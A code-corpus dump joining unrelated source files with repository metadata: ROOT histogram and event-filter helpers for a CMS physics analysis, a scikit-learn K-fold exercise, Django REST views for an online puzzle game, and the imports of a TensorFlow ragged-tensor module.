c1.GetPad(1).SetGridx()
c1.GetPad(1).SetGridy()
c1.GetPad(2).SetGridx()
c1.GetPad(2).SetGridy()
#c1.SetTopMargin(.13)
#c1.SetRightMargin(.04)
return c1
def mklegend(x1=.22, y1=.66, x2=.69, y2=.82, color=kWhite):
lg = TLegend(x1, y1, x2, y2)
lg.SetFillColor(color)
lg.SetTextFont(42)
lg.SetBorderSize(0)
lg.SetShadowColor(kWhite)
lg.SetFillStyle(0)
return lg
def mklegend_(x1=.22, y1=.66, x2=.69, y2=.82, color=kWhite):
lg = TLegend(x1, y1, x2, y2)
lg.SetFillColor(color)
lg.SetTextFont(42)
lg.SetBorderSize(0)
lg.SetShadowColor(kWhite)
lg.SetFillStyle(0)
return lg
def fillth1(h,x,weight=1):
h.Fill(min(max(x,h.GetXaxis().GetBinLowEdge(1)+epsilon),h.GetXaxis().GetBinLowEdge(h.GetXaxis().GetNbins()+1)-epsilon),weight)
def fillth2(h,x,y,weight=1):
h.Fill(min(max(x,h.GetXaxis().GetBinLowEdge(1)+epsilon),h.GetXaxis().GetBinLowEdge(h.GetXaxis().GetNbins()+1)-epsilon), min(max(y,h.GetYaxis().GetBinLowEdge(1)+epsilon),h.GetYaxis().GetBinLowEdge(h.GetYaxis().GetNbins()+1)-epsilon),weight)
def findbin(thebins, value):
for bin in thebins:
if value>=bin[0] and value<=bin[1]:
return bin
if value>thebins[-1]: return thebins[-1]
if value<thebins[0]: return thebins[0]
def namewizard(name):
if 'HardMet' == name:
return r'E_{T}^{miss} [GeV]'
if 'Met' == name:
return r'E_{T}^{miss} [GeV]'
if 'Ht' == name:
return r'H_{T} [GeV]'
if 'NJets' == name:
return r'n_{j}'
if 'BTags' == name:
return r'n_{b}'
if 'MinDPhiHardMetJets' == name:
return r'#Delta#phi_{min}'
if 'NLeptons' == name:
return r'n_{#ell}'
if 'NPhotons' == name:
return r'n_{#gamma}'
if 'NMuons' == name:
return r'n(#mu)'
if 'NTags' == name:
return r'n_{DT}'
if 'SumTagPtOverMet' == name:
return r'R^{*}'
if 'DPhiMetSumTags' == name:
return r'#Delta#phi^{*}'
if 'St' == name:
return r'H_{T}'
return name
def Struct(*args, **kwargs):
def init(self, *iargs, **ikwargs):
for k,v in kwargs.items():
setattr(self, k, v)
for i in range(len(iargs)):
setattr(self, args[i], iargs[i])
for k,v in ikwargs.items():
setattr(self, k, v)
name = kwargs.pop("name", "MyStruct")
kwargs.update(dict((k, None) for k in args))
return type(name, (object,), {'__init__': init, '__slots__': kwargs.keys()})
def mkHistoStruct(hname, binning):
if '_' in hname: var = hname[hname.find('_')+1:]
else: var = hname
histoStruct = Struct('Branch','Observed','GenSmeared','Gen','Rebalanced','RplusS')
if len(binning[var])==3:
nbins = binning[var][0]
low = binning[var][1]
high = binning[var][2]
histoStruct.Branch = TH1F('h'+hname+'Branch',hname+'Branch',nbins,low,high)
histoStruct.Observed = TH1F('h'+hname+'Observed',hname+'Observed',nbins,low,high)
histoStruct.GenSmeared = TH1F('h'+hname+'GenSmeared',hname+'GenSmeared',nbins,low,high)
histoStruct.Gen = TH1F('h'+hname+'Gen',hname+'Gen',nbins,low,high)
histoStruct.Rebalanced = TH1F('h'+hname+'Rebalanced',hname+'Rebalanced',nbins,low,high)
histoStruct.RplusS = TH1F('h'+hname+'RplusS',hname+'RplusS',nbins,low,high)
else:
nBin = len(binning[var])-1
binArr = array('d',binning[var])
histoStruct.Branch = TH1F('h'+hname+'Branch',hname+'Branch',nBin,binArr)
histoStruct.Observed = TH1F('h'+hname+'Observed',hname+'Observed',nBin,binArr)
histoStruct.GenSmeared = TH1F('h'+hname+'GenSmeared',hname+'GenSmeared',nBin,binArr)
histoStruct.Gen = TH1F('h'+hname+'Gen',hname+'Gen',nBin,binArr)
histoStruct.Rebalanced = TH1F('h'+hname+'Rebalanced',hname+'Rebalanced',nBin,binArr)
histoStruct.RplusS = TH1F('h'+hname+'RplusS',hname+'RplusS',nBin,binArr)
histoStyler(histoStruct.Branch,kRed)
histoStyler(histoStruct.Observed,kRed)
histoStyler(histoStruct.GenSmeared,kBlack)
histoStyler(histoStruct.Gen,kGreen)
histoStyler(histoStruct.Rebalanced,kBlue)
histoStyler(histoStruct.RplusS,kBlack)
return histoStruct
def writeHistoStruct(hStructDict):
for key in hStructDict:
#print 'writing histogram structure:', key
hStructDict[key].Branch.Write()
hStructDict[key].Observed.Write()
hStructDict[key].GenSmeared.Write()
hStructDict[key].Gen.Write()
hStructDict[key].Rebalanced.Write()
hStructDict[key].RplusS.Write()
def pause(str_='push enter key when ready'):
import sys
print str_
sys.stdout.flush()
raw_input('')
def mkmet(metPt, metPhi):
met = TLorentzVector()
met.SetPtEtaPhiE(metPt, 0, metPhi, metPt)
return met
datamc = 'Data'
def stamp(lumi='35.9', showlumi = False, WorkInProgress = True):
tl.SetTextFont(cmsTextFont)
tl.SetTextSize(0.98*tl.GetTextSize())
tl.DrawLatex(0.135,0.915, 'CMS')
tl.SetTextFont(extraTextFont)
tl.SetTextSize(1.0/0.98*tl.GetTextSize())
xlab = 0.213
if WorkInProgress: tl.DrawLatex(xlab,0.915, ' Work in progress')
else: tl.DrawLatex(xlab,0.915, ('MC' in datamc)*' simulation ')
tl.SetTextFont(regularfont)
tl.SetTextSize(0.81*tl.GetTextSize())
thingy = ''
if showlumi: thingy+='#sqrt{s}=13 TeV ('+str(lumi)+' fb^{-1})'
xthing = 0.6202
if not showlumi: xthing+=0.13
tl.DrawLatex(xthing,0.915,thingy)
tl.SetTextSize(1.0/0.81*tl.GetTextSize())
def calcTrackIso(trk, tracks):
ptsum = -trk.pt()
for track in tracks:
dR = TMath.Sqrt( (trk.eta()-track.eta())**2 + (trk.phi()-track.phi())**2)
if dR<0.3: ptsum+=track.pt()
return ptsum/trk.pt()
def calcTrackJetIso(trk, jets):
for jet in jets:
if not jet.pt()>30: continue
if TMath.Sqrt( (trk.eta()-jet.eta())**2 + (trk.phi()-jet.phi())**2)<0.5: return False
return True
'''
def calcMiniIso(trk, tracks):
pt = trk.pt()
ptsum = -pt
if pt<=50: R = 0.2
elif pt<=200: R = 10.0/pt
else: R = 0.05
for track in tracks:
dR = TMath.Sqrt( (trk.eta()-track.eta())**2 + (trk.phi()-track.phi())**2)
if dR<R: ptsum+=track.pt()
return ptsum/trk.pt()
def calcSumPt(jets, obj, conesize=0.6, thresh=10):
sumpt_ = 0
for jet in jets:
if not jet.Pt()>thresh:
continue
if not (obj.DeltaR(jet)<conesize):
continue
sumpt_+=jet.Pt()
return sumpt_
def getDPhis(metvec,jetvec):
dphilist = []
for j in range(4):
try:dphilist.append(abs(metvec.DeltaPhi(jetvec[j].tlv)))
except: dphilist.append(-5)
return dphilist
def isMatched(obj, col, dR=0.02, verbose = False):
matchedIdx = -1
bigDR = inf
for ic, thing in enumerate(col):
dr = thing.DeltaR(obj)
if verbose: print 'dr=',dr
if dr<dR:
ismatched = True
return thing
return False
def isMatched_(obj, col, dR=0.02, verbose = False):
matchedIdx = -1
bigDR = inf
for ic, thing in enumerate(col):
dr = thing[0].DeltaR(obj[0])
if verbose: print 'dr=',dr
if dr<dR:
ismatched = True
return thing
return False
def getLeadingGenBJet(GenJets, RecoJets, BTAG_CSV):
for gjet in GenJets:
for rjet in RecoJets:
dR_ = gjet.tlv.DeltaR(rjet.tlv)
if dR_<0.4 and rjet.csv>BTAG_CSV: return gjet
emptyvec = UsefulJet()
return emptyvec
def getLeadingBJet(RecoJets, CsvVec, BTAG_CSV):
for ireco in range(len(RecoJets)):
if not RecoJets[ireco].Pt()>30: continue
if CsvVec[ireco]>BTAG_CSV: return [ireco,RecoJets[ireco]]
emptyvec = TLorentzVector()
return [-1,emptyvec]
'''
def FabDraw(cGold,leg,hObserved,hComponents,datamc='mc',lumi='arbitrary', title = '', LinearScale=False, fractionthing='(bkg-obs)/obs'):
cGold.cd()
pad1 = TPad("pad1", "pad1", 0, 0.4, 1, 1.0)
pad1.SetBottomMargin(0.0)
pad1.SetLeftMargin(0.12)
if not LinearScale:
pad1.SetLogy()
pad1.SetGridx()
#pad1.SetGridy()
pad1.Draw()
pad1.cd()
for ih in range(1,len(hComponents[1:])+1):
hComponents[ih].Add(hComponents[ih-1])
hComponents.reverse()
if abs(hComponents[0].Integral(-1,999)-1)<0.001:
hComponents[0].GetYaxis().SetTitle('Normalized')
else: hComponents[0].GetYaxis().SetTitle('Events/GeV')
cGold.Update()
hObserved.GetYaxis().SetTitle('Normalized')
hObserved.GetYaxis().SetTitleOffset(1.15)
hObserved.SetMarkerStyle(20)
histheight = 1.5*max(hComponents[0].GetMaximum(),hObserved.GetMaximum())
if LinearScale: low, high = 0, histheight
else: low, high = max(0.001,max(hComponents[0].GetMinimum(),hObserved.GetMinimum())), 1000*histheight
title0 = hObserved.GetTitle()
if datamc=='MC':
for hcomp in hComponents: leg.AddEntry(hcomp,hcomp.GetTitle(),'lf')
leg.AddEntry(hObserved,hObserved.GetTitle(),'lpf')
else:
for ihComp, hComp in enumerate(hComponents):
leg.AddEntry(hComp, hComp.GetTitle(),'lpf')
leg.AddEntry(hObserved,title0,'lp')
hObserved.SetTitle('')
hComponents[0].SetTitle('')
hComponents[0].Draw('hist')
for h in hComponents[1:]:
h.Draw('hist same')
cGold.Update()
print 'updating stack', h
hComponents[0].Draw('same')
hObserved.Draw('p same')
hObserved.Draw('e same')
cGold.Update()
hComponents[0].Draw('axis same')
leg.Draw()
cGold.Update()
stampFab(lumi,datamc)
cGold.Update()
cGold.cd()
pad2 = TPad("pad2", "pad2", 0, 0.05, 1, 0.4)
pad2.SetTopMargin(0.0)
pad2.SetBottomMargin(0.3)
pad2.SetLeftMargin(0.12)
pad2.SetGridx()
pad2.SetGridy()
pad2.Draw()
pad2.cd()
hObservedCopy = hObserved.Clone('hObservedClone'+hComponents[0].GetName())
hRatio = hObservedCopy.Clone('hRatioClone')#hComponents[0].Clone('hRatioClone')#+hComponents[0].GetName()+'testing
hRatio.SetMarkerStyle(20)
#hFracDiff = hComponents[0].Clone('hFracDiff')
#hFracDiff.SetMarkerStyle(20)
hObservedCopy.SetMarkerStyle(20)
hObservedCopy.SetMarkerColor(1)
#histoStyler(hFracDiff, 1)
histoStyler(hObservedCopy, 1)
#hFracDiff.Add(hObservedCopy,-1)
#hFracDiff.Divide(hObservedCopy)
#hRatio.Divide(hObservedCopy)
hRatio.Divide(hComponents[0])
hRatio.GetYaxis().SetRangeUser(0.0,.1)###
hRatio.SetTitle('')
if 'prediction' in title0: hFracDiff.GetYaxis().SetTitle('(RS-#Delta#phi)/#Delta#phi')
else: hRatio.GetYaxis().SetTitle(fractionthing)
hRatio.GetXaxis().SetTitleSize(0.12)
hRatio.GetXaxis().SetLabelSize(0.11)
hRatio.GetYaxis().SetTitleSize(0.12)
hRatio.GetYaxis().SetLabelSize(0.12)
hRatio.GetYaxis().SetNdivisions(5)
hRatio.GetXaxis().SetNdivisions(10)
hRatio.GetYaxis().SetTitleOffset(0.5)
hRatio.GetXaxis().SetTitleOffset(1.0)
hRatio.GetXaxis().SetTitle(hObserved.GetXaxis().GetTitle())
hRatio.Draw()
hRatio.Draw('e0')
pad1.cd()
hComponents.reverse()
hObserved.SetTitle(title0)
return hRatio
def FabDrawSystyRatio(cGold,leg,hObserved,hComponents,datamc='mc',lumi=35.9, title = '', LinearScale=False, fractionthing='(bkg-obs)/obs'):
cGold.cd()
pad1 = TPad("pad1", "pad1", 0, 0.4, 1, 1.0)
pad1.SetBottomMargin(0.0)
pad1.SetLeftMargin(0.12)
if not LinearScale:
pad1.SetLogy()
#pad1.SetGridx()
#pad1.SetGridy()
pad1.Draw()
pad1.cd()
for ih in range(1,len(hComponents[1:])+1):
hComponents[ih].Add(hComponents[ih-1])
hComponents.reverse()
if abs(hComponents[0].Integral(-1,999)-1)<0.001:
hComponents[0].GetYaxis().SetTitle('Normalized')
else: hComponents[0].GetYaxis().SetTitle('Events/GeV')
cGold.Update()
hObserved.GetYaxis().SetTitle('Normalized')
hObserved.GetYaxis().SetTitleOffset(1.15)
hObserved.SetMarkerStyle(20)
histheight = 1.5*max(hComponents[0].GetMaximum(),hObserved.GetMaximum())
if LinearScale: low, high = 0, histheight
else: low, high = max(0.001,max(hComponents[0].GetMinimum(),hObserved.GetMinimum())), 1000*histheight
title0 = hObserved.GetTitle()
if datamc=='MC':
for hcomp in hComponents: leg.AddEntry(hcomp,hcomp.GetTitle(),'lf')
leg.AddEntry(hObserved,hObserved.GetTitle(),'lpf')
else:
for ihComp, hComp in enumerate(hComponents):
leg.AddEntry(hComp, hComp.GetTitle(),'lpf')
leg.AddEntry(hObserved,title0,'lp')
hObserved.SetTitle('')
hComponents[0].SetTitle('')
xax = hComponents[0].GetXaxis()
hComponentsUp = hComponents[0].Clone(hComponents[0].GetName()+'UpVariation')
hComponentsUp.SetLineColor(kWhite)
hComponentsDown = hComponents[0].Clone(hComponents[0].GetName()+'DownVariation')
hComponentsDown.SetFillColor(10)
hComponentsDown.SetFillStyle(1001)
hComponentsDown.SetLineColor(kWhite)
for ibin in range(1, xax.GetNbins()+1):
hComponentsUp.SetBinContent(ibin, hComponents[0].GetBinContent(ibin)+hComponents[0].GetBinError(ibin))
hComponentsDown.SetBinContent(ibin, hComponents[0].GetBinContent(ibin)-hComponents[0].GetBinError(ibin))
hComponents[0].Draw('hist')
#hComponentsUp.Draw('hist')
#hComponentsDown.Draw('hist same')
for h in hComponents[1:]:
print 'there are actually components here!'
h.Draw('hist same')
cGold.Update()
print 'updating stack', h
#hComponents[0].Draw('same')
hObserved.Draw('p same')
hObserved.Draw('e same')
cGold.Update()
hComponents[0].Draw('axis same')
leg.Draw()
cGold.Update()
stampFab(lumi,datamc)
cGold.Update()
cGold.cd()
pad2 = TPad("pad2", "pad2", 0, 0.05, 1, 0.4)
pad2.SetTopMargin(0.0)
pad2.SetBottomMargin(0.3)
pad2.SetLeftMargin(0.12)
#pad2.SetGridx()
pad2.SetGridy()
pad2.Draw()
pad2.cd()
hObservedCopy = hObserved.Clone('hObservedClone'+hComponents[0].GetName())
hRatio = hObservedCopy.Clone('hRatioClone')#hComponents[0].Clone('hRatioClone')#+hComponents[0].GetName()+'testing
hRatio.SetMarkerStyle(20)
#hFracDiff = hComponents[0].Clone('hFracDiff')
#hFracDiff.SetMarkerStyle(20)
hObservedCopy.SetMarkerStyle(20)
hObservedCopy.SetMarkerColor(1)
#histoStyler(hFracDiff, 1)
histoStyler(hObservedCopy, 1)
#hFracDiff.Add(hObservedCopy,-1)
#hFracDiff.Divide(hObservedCopy)
#hRatio.Divide(hObservedCopy)
histoByWhichToDivide = hComponents[0].Clone()
for ibin in range(1, xax.GetNbins()+1): histoByWhichToDivide.SetBinError(ibin, 0)
hRatio.Divide(histoByWhichToDivide)
hRatio.GetYaxis().SetRangeUser(0.0,.1)###
hRatio.SetTitle('')
if 'prediction' in title0: hFracDiff.GetYaxis().SetTitle('(RS-#Delta#phi)/#Delta#phi')
else: hRatio.GetYaxis().SetTitle(fractionthing)
hRatio.GetXaxis().SetTitleSize(0.12)
hRatio.GetXaxis().SetLabelSize(0.11)
hRatio.GetYaxis().SetTitleSize(0.12)
hRatio.GetYaxis().SetLabelSize(0.12)
hRatio.GetYaxis().SetNdivisions(5)
hRatio.GetXaxis().SetNdivisions(10)
hRatio.GetYaxis().SetTitleOffset(0.5)
hRatio.GetXaxis().SetTitleOffset(1.0)
hRatio.GetXaxis().SetTitle(hObserved.GetXaxis().GetTitle())
hRatio.Draw()
histoMethodFracErrorNom = hComponents[0].Clone(hComponents[0].GetName()+'hMethodSystNom')
histoMethodFracErrorNom.SetLineColor(kBlack)
histoMethodFracErrorNom.SetFillStyle(1)
histoMethodFracErrorUp = hComponents[0].Clone(hComponents[0].GetName()+'hMethodSystUp')
histoMethodFracErrorUp.SetFillStyle(3001)
histoMethodFracErrorUp.SetLineColor(kWhite)
histoMethodFracErrorUp.SetFillColor(hComponents[0].GetFillColor())
histoMethodFracErrorDown = hComponents[0].Clone(hComponents[0].GetName()+'hMethodSystDown')
histoMethodFracErrorDown.SetLineColor(kWhite)
#histoMethodFracErrorDown.SetFillStyle(1001)
histoMethodFracErrorDown.SetFillColor(10)
for ibin in range(1, xax.GetNbins()+1):
content = histoMethodFracErrorUp.GetBinContent(ibin)
if content>0: err = histoMethodFracErrorUp.GetBinError(ibin)/content
else: err = 0
histoMethodFracErrorUp.SetBinContent(ibin, 1+err)
histoMethodFracErrorUp.SetBinError(ibin, 0)
histoMethodFracErrorDown.SetBinContent(ibin, 1-err)
histoMethodFracErrorDown.SetBinError(ibin, 0)
histoMethodFracErrorNom.SetBinContent(ibin, 1)
histoMethodFracErrorNom.SetBinError(ibin, 0)
hRatio.GetYaxis().SetRangeUser(-0.2,3.2)
hRatio.Draw('e0')
histoMethodFracErrorUp.Draw('same hist')
histoMethodFracErrorNom.Draw('same')
histoMethodFracErrorDown.Draw('same hist')
hRatio.Draw('e0 same')
hRatio.Draw('axis same')
pad1.cd()
hComponents.reverse()
hObserved.SetTitle(title0)
pad1.Update()
return hRatio, [histoMethodFracErrorNom, histoMethodFracErrorUp, histoMethodFracErrorDown, hComponentsUp, hComponentsDown]
def stampFab(lumi = 'n/a',datamc='MC'):
tl.SetTextFont(cmsTextFont)
tl.SetTextSize(1.6*tl.GetTextSize())
tl.DrawLatex(0.152,0.82, 'CMS')
tl.SetTextFont(extraTextFont)
tl.DrawLatex(0.14,0.74, ('MC' in datamc)*' simulation internal')
tl.SetTextFont(regularfont)
if lumi=='': tl.DrawLatex(0.62,0.82,'#sqrt{s} = 13 TeV')
else: tl.DrawLatex(0.48,0.82,'#sqrt{s} = 13 TeV ('+str(lumi)+' fb^{-1})')
#tl.DrawLatex(0.64,0.82,'#sqrt{s} = 13 TeV')#, L = '+str(lumi)+' fb^{-1}')
tl.SetTextSize(tl.GetTextSize()/1.6)
units = {}
units['HardMet']='GeV'
units['Met']=units['HardMet']
units['Ht']='GeV'
units['St']='GeV'
units['NJets']='bin'
units['BTags']='bin'
units['Jet1Pt']='GeV'
units['Jet1Eta']='bin'
units['Jet2Pt']='GeV'
units['Jet2Eta']='bin'
units['Jet3Pt']='GeV'
units['Jet3Eta']='bin'
units['Jet4Pt']='GeV'
units['Jet4Eta']='bin'
units['HardMetPhi']='rad'
units['DPhi1']='rad'
units['DPhi2']='rad'
units['DPhi3']='rad'
units['DPhi4']='rad'
units['SearchBins']='bin'
units['MvaLowHardMet']='bin'
units['MvaLowHt']='bin'
units['Odd']='modulo false'
units['csvAve']=''
units['BestDijetMass']='GeV'
units['MinDeltaM']='GeV'
units['MaxDPhi']='rad'
units['MaxForwardPt'] = 'GeV'
units['MaxHemJetPt'] = 'GeV'
units['HtRatio'] = 'bin'
units['MinDeltaPhi'] = 'bin'
units['NPhotons'] = 'bin'
units['DPhiPhoPho'] = 'bin'
baseline = {}
baseline['HardMet'] = 300
baseline['Ht'] = 300
baseline['NJets'] = 2
baseline['BTags'] = 0
baseline['DPhi1'] = 0.5
baseline['DPhi2'] = 0.5
baseline['DPhi3'] = 0.3
baseline['DPhi4'] = 0.3
baselineStr = {}
baselineStr['HardMet']='E_{T}^{miss} > '+str(baseline['HardMet'])+' GeV'
baselineStr['Ht']='H_{T} > '+str(baseline['Ht'])+' GeV'
baselineStr['NJets']='N_{jets} #geq '+str(baseline['NJets'])
baselineStr['BTags']=''
baselineStr['DPhi1']='#Delta#phi_{1}'
baselineStr['DPhi2']='#Delta#phi_{2}'
baselineStr['DPhi3']='#Delta#phi_{3}'
baselineStr['DPhi4']='#Delta#phi_{4}'
def mkCutsLabel(kinvar,regionselect='', baselineStr_ = baselineStr):
str_ = ''
for key in baselineStr:
if kinvar in key: continue
if baselineStr_[key]=='': continue
if kinvar=='Met' and 'miss' in baselineStr_[key]: continue
if 'Phi' in key and 'LowDeltaPhi' in regionselect: continue
if 'Jet' in kinvar and 'Jets' not in kinvar and 'HardMet' in key: continue
str_+= baselineStr_[key]+', '
if len(str_)>1:
if str_[-2:]==', ':
str_=str_[:-2]
if 'LowDeltaPhi' in regionselect: str_+= ', #Delta#phi(inv.)'
return str_
def mkLabel(str_,kinvar,selection=''):
newstr = str_
if newstr[0]=='h':newstr = newstr[1:]
newstr = newstr.replace('GenSmeared',' gen-smeared ')
newstr = newstr.replace('Rebalanced',' rebalanced ')
newstr = newstr.replace('RplusS','QCD R&S')
newstr = newstr.replace('Observed','QCD Observed')
newstr = newstr.replace(kinvar,'')
newstr = newstr.replace('_b','').replace('_','')
newstr = newstr.replace(selection+' ','')
return newstr
def nicelabel(label):
label_ = label
label_ = label_.replace('Vs',' vs ')
label_ = label_.replace('HardMet','E_{T}^{miss}')
label_ = label_.replace('St','H_{T}')
label_ = label_.replace('Met','E_{T}^{miss}')
label_ = label_.replace('Ht','H_{T}')
label_ = label_.replace('NJets','N_{jets}')
label_ = label_.replace('BTags','N_{b-jets}')
label_ = label_.replace('Pt',' p_{T}')
label_ = label_.replace('Eta',' #eta')
if 'DPhi' in label_:
label_ = label_.replace('DPhi','#Delta#phi(H^{miss}_{T}, jet')
label_ = label_+')'
numberloc = max(label_.find('1'),label_.find('2'),label_.find('3'),label_.find('4'))+1
label_ = label_[:numberloc]+', '+label_[numberloc:]
label_ = label_.replace(', )',')')
return label_
def passQCDHighMETFilter(t):
metvec = mkmet(t.MET, t.METPhi)
for ijet, jet in enumerate(t.Jets):
if not (jet.Pt() > 200): continue
if not (t.Jets_muonEnergyFraction[ijet]>0.5):continue
if (abs(jet.DeltaPhi(metvec)) > (3.14159 - 0.4)): return False
return True
def passQCDHighMETFilter2(t):
if len(t.Jets)>0:
metvec = TLorentzVector()
metvec.SetPtEtaPhiE(t.MET, 0, t.METPhi,0)
if abs(t.Jets[0].DeltaPhi(metvec))>(3.14159-0.4) and t.Jets_neutralEmEnergyFraction[0]<0.03:
return False
return True
def passesUniversalSelection(t):
if not ( t.NVtx>0): return False #bool(t.JetID) and
if not passQCDHighMETFilter(t): return False
if not passQCDHighMETFilter2(t): return False
if not t.PFCaloMETRatio<5: return False
#featuring:
#if not t.globalTightHalo2016Filter: return False ##this alone was good # only these comments weren't saved on last submission
if not bool(t.globalSuperTightHalo2016Filter): return False
if not bool(t.HBHENoiseFilter): return False
if not bool(t.HBHEIsoNoiseFilter): return False
if not bool(t.eeBadScFilter): return False
if not bool(t.BadChargedCandidateFilter): return False
if not bool(t.BadPFMuonFilter): return False
if not bool(t.CSCTightHaloFilter): return False
if not bool(t.EcalDeadCellTriggerPrimitiveFilter): return False ##I think this one makes a sizeable difference
if not bool(t.ecalBadCalibReducedExtraFilter): return False
if not bool(t.ecalBadCalibReducedFilter): return False
'''#first half filters up edge
#first half filters low edge
####if not t.ecalBadCalibFilter: return False #this says it's deprecated
'''#second half filters low edge
return True
def passesHadronicSusySelection(t):
if not (t.NElectrons==0 and t.NMuons==0 and t.isoElectronTracks==0 and t.isoMuonTracks==0 and t.isoPionTracks==0): return False
return True
| [
"[email protected]"
] | |
71e678a0332eb9b0dddc74e7ee7677d3d3e5f0be | d10c5d3603e027a8fd37115be05e62634ec0f0a5 | /10_Supervised-Learning-with-scikit-learn/10_ex_2-10.py | 684d17126431f630f2a9e550a279918f00947165 | [] | no_license | stacygo/2021-01_UCD-SCinDAE-EXS | 820049125b18b38ada49ffc2036eab33431d5740 | 027dc2d2878314fc8c9b2796f0c2e4c781c6668d | refs/heads/master | 2023-04-29T01:44:36.942448 | 2021-05-23T15:29:28 | 2021-05-23T15:29:28 | 335,356,448 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 555 | py | # Exercise 2-10: K-Fold CV comparison
import numpy as np
import pandas as pd
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import cross_val_score
df = pd.read_csv('input/gm_2008_region.csv')
y = df['life'].values
X = df.drop(['life', 'Region'], axis=1).values
# Create a linear regression object: reg
reg = LinearRegression()
# Perform 3-fold CV
cvscores_3 = cross_val_score(reg, X, y, cv=3)
print(np.mean(cvscores_3))
# Perform 10-fold CV
cvscores_10 = cross_val_score(reg, X, y, cv=10)
print(np.mean(cvscores_10))
| [
"[email protected]"
] | |
a357f99eeb2586079e4f9f2f7d69c6f57ffcb713 | 8522034ed44d22a50b45f36e7dea057b1ca9c9bd | /core/views.py | 49d2d84d2b27fb7ee828f7685fc2c656a7e45160 | [] | no_license | JayjeetAtGithub/oth2 | 71c769150d132a253ce9a64da83442ed3409a592 | d8be9b8e69d23c137045ce8485b27e08300db809 | refs/heads/master | 2020-03-22T14:04:51.838326 | 2018-07-16T18:11:18 | 2018-07-16T18:11:18 | 140,152,306 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,524 | py | from django.shortcuts import render
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from .models import Player , Level , TotalLevel
from .serializers import PlayerSerializer , LevelSerializer , TotalLevelSerializer , LeaderboardSerializer , UserSerializer
from django.contrib.auth.models import User
from django.contrib.auth import authenticate
from datetime import datetime
class Leaderboard(APIView):
def get(self,request,format=None):
user = request.user
if user.is_authenticated:
player_rank_list = Player.objects.order_by('-score','timestamp')
rank_counter = 1
for player in player_rank_list :
player.rank = rank_counter
player.save()
rank_counter += 1
players = Player.objects.all()
serializer = LeaderboardSerializer(players,many=True)
return Response(serializer.data)
return Response("Unauthenticated")
class Rules(APIView):
def get(self,request,format=None):
user = request.user
if user.is_authenticated:
return Response('Rules')
return Response("Unauthenticated")
class RegisterUser(APIView):
def post(self,request,format=None):
current_user = User.objects.filter(username=request.data['username']).first()
if current_user is not None:
serializer = UserSerializer(current_user)
return Response(serializer.data)
else:
user = User.objects.create_user(request.data['username'])
user.email = request.data['email']
user.first_name = request.data['first_name']
user.last_name = request.data['last_name']
user.save()
player = Player(user=user , player_name = user.first_name + " " + user.last_name)
player.save()
serializer = UserSerializer(user)
return Response(serializer.data,status=status.HTTP_201_CREATED)
class Index(APIView):
def get(self,request,format=None):
last_level = TotalLevel.objects.filter(id=1).first().total_level
user = request.user
if user.is_authenticated:
player = Player.objects.filter(user=user).first()
try:
level = Level.objects.filter(level_number=player.current_level)
return Response("level")
except Level.DoesNotExist:
if player.current_level > last_level:
return Response("win")
return Response("finish")
return Response("index")
class Answer(APIView):
def post(self,request,format=None):
last_level = TotalLevel.objects.filter(id=1).first()
ans = request.data['ans']
user = request.user
if user.is_authenticated:
player = Player.objects.filter(user=user).first()
try:
level = Level.objects.filter(level_number=player.current_level)
except Level.DoesNotExist:
if player.current_level > last_level:
return Response("win")
return Response("finish")
if ans == level.answer:
player.current_level = player.current_level + 1
player.score = player.score + 10
player.timestamp = datetime.now
level.number_of_user = level.number_of_user + 1
level.accuracy = round(level.number_of_user/(float(level.number_of_user + level.wrong)),2)
level.save()
player.save()
try:
level = Level.objects.filter(level_number=player.current_level).first()
return render(request, 'level_transition.html')
return Response("level")
except:
if player.current_level > last_level:
return Response("win")
return Response("finish")
elif ans == "":
pass
else:
level.wrong = level.wrong + 1
level.save()
return Response("Unauthorized")
| [
"[email protected]"
] | |
b99feeb950808a1214d6463cae0a95bd16ba39f0 | ffe4c155e228f1d3bcb3ff35265bb727c684ec1a | /Codes/file写入/compute_sum.py | 64fade6866b28dd98f940d12e8ea81c8fefedaa8 | [] | no_license | yuuee-www/Python-Learning | 848407aba39970e7e0058a4adb09dd35818c1d54 | 2964c9144844aed576ea527acedf1a465e9a8664 | refs/heads/master | 2023-03-12T00:55:06.034328 | 2021-02-28T13:43:14 | 2021-02-28T13:43:14 | 339,406,816 | 0 | 0 | null | 2021-02-28T11:27:40 | 2021-02-16T13:26:46 | Jupyter Notebook | UTF-8 | Python | false | false | 414 | py | def main():
sum = 0.0
with open("bad_numbers.txt") as file:
for n in file.read().split():
# try to convert n to a float, but if it
# is not a valid float, print error message
try:
print(float(n))
sum += float(n)
except ValueError:
print("Invalid number:", n)
print("Sum is:", round(sum, 1))
main() | [
"[email protected]"
] | |
4f836b2023d170e009b30b7f259ccce89b59b81b | a71582e89e84a4fae2595f034d06af6d8ad2d43a | /tensorflow/python/ops/ragged/ragged_dispatch.py | 1115eee4129f202ecda914d185a6dc76e3187919 | [
"Apache-2.0"
] | permissive | tfboyd/tensorflow | 5328b1cabb3e24cb9534480fe6a8d18c4beeffb8 | 865004e8aa9ba630864ecab18381354827efe217 | refs/heads/master | 2021-07-06T09:41:36.700837 | 2019-04-01T20:21:03 | 2019-04-01T20:26:09 | 91,494,603 | 3 | 0 | Apache-2.0 | 2018-07-17T22:45:10 | 2017-05-16T19:06:01 | C++ | UTF-8 | Python | false | false | 19,006 | py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Operator dispatch for RaggedTensors."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import gen_bitwise_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_array_ops
from tensorflow.python.ops.ragged import ragged_batch_gather_ops
from tensorflow.python.ops.ragged import ragged_concat_ops
